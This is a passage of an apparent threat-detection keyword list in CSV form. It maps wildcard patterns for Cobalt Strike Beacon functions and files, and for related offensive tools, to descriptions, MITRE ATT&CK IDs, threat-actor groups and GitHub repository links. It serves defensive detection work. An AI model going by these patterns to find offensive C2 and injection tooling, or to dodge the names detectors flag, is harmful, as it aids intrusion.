T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 
- T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 
- APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_elevators*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_elevators*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
+"*beacon_endpoint*c2Get*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" +"*beacon_endpoint*c2Post*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" +"*beacon_execute_job*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_exploit_describe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 
- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_exploit_register*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*beacon_funcs.c*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*beacon_funcs.h*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*beacon_funcs.x64.*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*beacon_funcs.x86.*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*beacon_generate.py*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*beacon_generate.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*Beacon_GETPOST*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*beacon_host_script*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*beacon_host_script*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 
- T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" +"*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 
